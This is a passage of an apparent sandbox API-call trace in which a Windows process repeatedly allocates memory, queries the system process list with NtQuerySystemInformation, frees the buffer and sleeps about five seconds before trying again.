(ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.423] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.430] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.439] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.499] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.743] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.859] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.883] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.892] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.900] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.038] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.079] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.090] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.101] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.258] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.388] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.396] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.449] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, 